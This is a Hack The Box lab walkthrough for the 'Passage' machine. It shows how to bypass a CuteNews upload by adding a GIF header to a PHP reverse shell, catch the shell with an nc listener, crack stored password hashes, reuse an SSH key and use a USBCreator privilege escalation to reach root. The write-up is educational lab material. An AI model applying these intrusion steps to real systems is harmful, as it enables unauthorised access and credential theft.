Passage : HTB Walkthrough

6 min readJul 11, 2021

Ok Lets start:

We always start with nmap → nmap -sC -sV 10.10.10.206

We have port 22 and 80 open, also we can see looking at the headers this is a ubuntu box. Lets check out the website. Very generic looking page with standard Lorem Ipsum texts.

Exercise : Checking the main page source gives us great information right in the beginning. If you read through the source , you will notice we can see two different users “nadav@passage.htb” and “paul@passage.htb”

Getting back to website. Clicking at other links we see below, it is maintained by Cutenews CMS. Lets see if we can navigate to cutenews → http://10.10.10.206/CuteNews

We could try brute-forcing but it takes lot of time, also we don’t know for sure that if there is any account lock out policy after a certain number of tries. So we need to very very careful with using brute forcing, will skip this for now.

Lets register a user called abcd, enter all details and we are in.

[NOTE: do not add your personal information here]

Checking personal options , we notice the user needs to update the profile. Good thing is we have an upload button.

That is always an interesting find because whenever there is an upload action, we know that there is an interaction with the server. And if there is interaction , may be we can manipulate the action in our favor to get a shell. Also notice our URL, it’s a .php url, so possible assumption that it is processing .php files.

Which straight away gives us a clue may be we can upload a php shell here.

Exercise : Lets search for a php shell on google to upload.

I will use this: https://github.com/pentestmonkey/php-reverse-shell

Git clone this url to download the reverse shell. Lets edit the reverse shell, if you read the shell there is nothing much to apart from changing the ip and the port. It is even written “CHANGE THIS”.

Also as we are uploading an avatar, we need our reverse shell to appear as a picture format or a GIF, so we are going to add a ( GIF8; )at the beginning of our shell file to make our exploit appear as gif file instead of a php. Server will assume its a gif, but actually execute our shell code. And then you can point at server and say “April Fool”.. ;-)

Ok save it and its time to upload. Start out nc listener and upload the file.

nc -lvnp 1234

We see file uploaded , but we still don’t have any connection on our nc listener because we need to navigate to where our file is .. Our file is uploaded but our shell still needs to be executed.

Look at the source of this page, we see what location that the file is uploaded, so lets go there.

Once you navigate and open the file we should get the connection on our listener, and now to get a proper bash shell we will use:

python3 -c ‘import pty;pty.spawn(“/bin/bash”) and we get www-data@passage.

After a while of enumerating, we find something interesting in /var/www/html/CuteNews/cdata. What we see here is a users folder which holds all the user data in a file called “lines” THATS ODD. Lets see the contents by using cat command.

Decoding them we get very useful information.

So we see here that both Nadav and Paul users exists which we found right at the beginning and now we have their passwords but they are also encoded, lets copy the encoded password and try to decode them.

You can use any online hash decoder. Now when we do that we observe that we could decode Paul’s password which is atlanta1, but we cannot decode Nadav’s password.

So we are going to use Paul and his password atlanta1

Simply in our shell we can do su - paul. Enter password atlanta1 and we have got the Paul user bash.

Easy enough to get the user.txt flag from here

We now need to do privilege escalation to get the root flag. So we keep looking through around interesting enough we find ssh keys.

Looking closely this key appears to be of Nadav user.

But what is it doing in Paul's folder. May be Paul and Nadav are using same keys to ssh . We could try ssh from Paul to Nadav if they are using same keys it should be easy to do .

We are nadav now but when we check for root.txt flag. We don’t see it . Because we still a user, so we need to escalate privileges to get root.

Looking through files and folders, I find a .viminfo file. When we read this file This gives us an idea of what the user was doing earlier. Notice he was editing a file which is usb creator.conf

If you are following and trying through the box with me. I want to you try and search for this file. Its a good exercise to become better navigating around in the Linux file system. It will improve your enumeration skills to a whole new level when you do Pentesting.

Over time you will slowly start understanding what to look for and where to look for.

EXERCISE : Lets google what is usb creater ? — we find a privilege escalation exploit on exploit-db. Interesting!

Also read through the link below to understand what exactly is happening with this technique.

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

So based on the syntax given here, I will be modifying a little bit to get the root private key to ssh into root. Then we will navigate to the folder where we saved this key.